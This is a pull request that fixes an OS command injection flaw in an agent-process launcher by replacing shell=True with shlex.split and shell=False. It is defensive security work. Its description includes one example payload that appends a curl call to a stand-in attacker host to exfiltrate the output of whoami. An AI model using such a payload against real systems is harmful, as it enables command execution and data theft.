### PR TITLE
fix: Disable shell=True in agent process launcher to prevent command injection

### DIFF
--- a/python_a2a/agent_flow/utils/agent_manager.py
+++ b/python_a2a/agent_flow/utils/agent_manager.py
@@ -193,9 +193,10 @@ class AgentManager:
             logger.info(f"Starting agent server with command: {command}")
             
             # Start the server process
+            import shlex as _shlex
             process = subprocess.Popen(
-                command,
-                shell=True,
+                _shlex.split(command) if isinstance(command, str) else command,
+                shell=False,
                 stdout=subprocess.PIPE,
                 stderr=subprocess.PIPE,
                 universal_newlines=True

--- a/python_a2a/agent_flow/utils/agent_manager.py
+++ b/python_a2a/agent_flow/utils/agent_manager.py
@@ -6,6 +6,7 @@ with auto-registration and status monitoring.
 """
 
 import os
+import shlex
 import time
 import json
 import logging
@@ -193,9 +194,8 @@ class AgentManager:
             logger.info(f"Starting agent server with command: {command}")
             
             # Start the server process
-            import shlex as _shlex
             process = subprocess.Popen(
-                _shlex.split(command) if isinstance(command, str) else command,
+                shlex.split(command) if isinstance(command, str) else command,
                 shell=False,
                 stdout=subprocess.PIPE,
                 stderr=subprocess.PIPE,


### PR DESCRIPTION
## Summary

`agent_flow/utils/agent_manager.py` launches agent server processes via `subprocess.Popen(command, shell=True)`. If the `command` string contains shell metacharacters (semicolons, pipes, backticks), the shell will interpret them — enabling OS command injection.

## Vulnerable code

```python
# line 196-202
process = subprocess.Popen(
    command,
    shell=True,
    ...
)
```

An attacker who influences the `command` value (e.g. via a malicious agent name or config) can inject:
```
python server.py; curl attacker.com/$(whoami)
```

## Fix

Use `shlex.split()` to tokenize the command string and pass `shell=False`, so the OS executes the binary directly without a shell interpreter:

```python
import shlex
process = subprocess.Popen(
    shlex.split(command) if isinstance(command, str) else command,
    shell=False,
    ...
)
```

## Impact

**Critical** — OS command injection enabling arbitrary command execution.